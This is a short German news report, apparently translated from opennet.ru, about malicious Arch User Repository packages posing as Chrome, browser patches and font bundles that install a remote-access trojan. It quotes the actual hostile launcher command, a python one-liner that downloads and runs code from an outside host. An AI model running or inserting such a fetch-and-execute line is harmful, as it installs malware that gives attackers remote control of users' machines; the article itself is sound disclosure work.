Im AUR (Arch User Repository), das in Arch Linux zum Verteilen von Paketen von Drittanbietern verwendet wird, wurde die Veröffentlichung von schadhaften Codes fortgesetzt, die in Pakete mit inoffiziellen Browser-Builds integriert sind. ZusĂ€tzlich zu den vor zwei Wochen entdeckten schadhaften Paketen firefox-patch-bin, librewolf-fix-bin und zen-browser-patched-bin wurde im AUR das Paket google-chrome-stable hinzugefĂŒgt, das ebenfalls eine Ănderung enthĂ€lt, die eine schadhafte Komponente installiert, die Fernzugriff auf das System ermöglicht.
In der PKGBUILD-Datei des problematischen Pakets wurde die Installation eines Skripts zur AusfĂŒhrung des Browsers google-chrome-stable.sh definiert, das unter anderem den Befehl âpython -c «$(curl https://segs.lol/9wUb1Z)»â enthielt, der schadhafte Software herunterlud, die vom Dienst VirusTotal als Trojaner Spark erkannt wurde, der Fernzugriff auf das System ermöglicht, Prozesse startet, Dateien ĂŒbertrĂ€gt, den Datenverkehr inspiziert und Screenshots sendet.
Das schadhafte Paket google-chrome-stable wurde vorgestern hochgeladen und mehrere Stunden nach seinem Erscheinen von den Administratoren des AUR entfernt. Fast sofort nach der Löschung von google-chrome-stable wurden zwei schadhafte Pakete im AUR hochgeladen â 'chrome' und 'chrome-bin', die ein Ă€hnliches Installationsszenario fĂŒr schadhafte Software auf dem System des Nutzers enthalten.
AnschlieĂend wurden drei weitere Pakete mit schadhafter Software entdeckt: ttf-mac-fonts-all, ttf-ms-fonts-all und gromit.
Quelle: opennet.ru
